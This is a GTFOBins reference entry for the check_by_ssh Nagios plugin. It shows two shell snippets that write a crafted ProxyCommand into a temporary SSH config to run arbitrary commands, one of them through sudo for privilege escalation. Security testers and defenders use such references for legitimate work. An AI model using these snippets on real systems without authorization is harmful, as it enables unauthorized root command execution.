1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-15 03:41:34 +01:00
GTFOBins.github.io/_gtfobins/check_by_ssh.md

572 B

description functions
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
command sudo
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF check_by_ssh -F $TF -H localhost -C something cat $OUTPUT
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT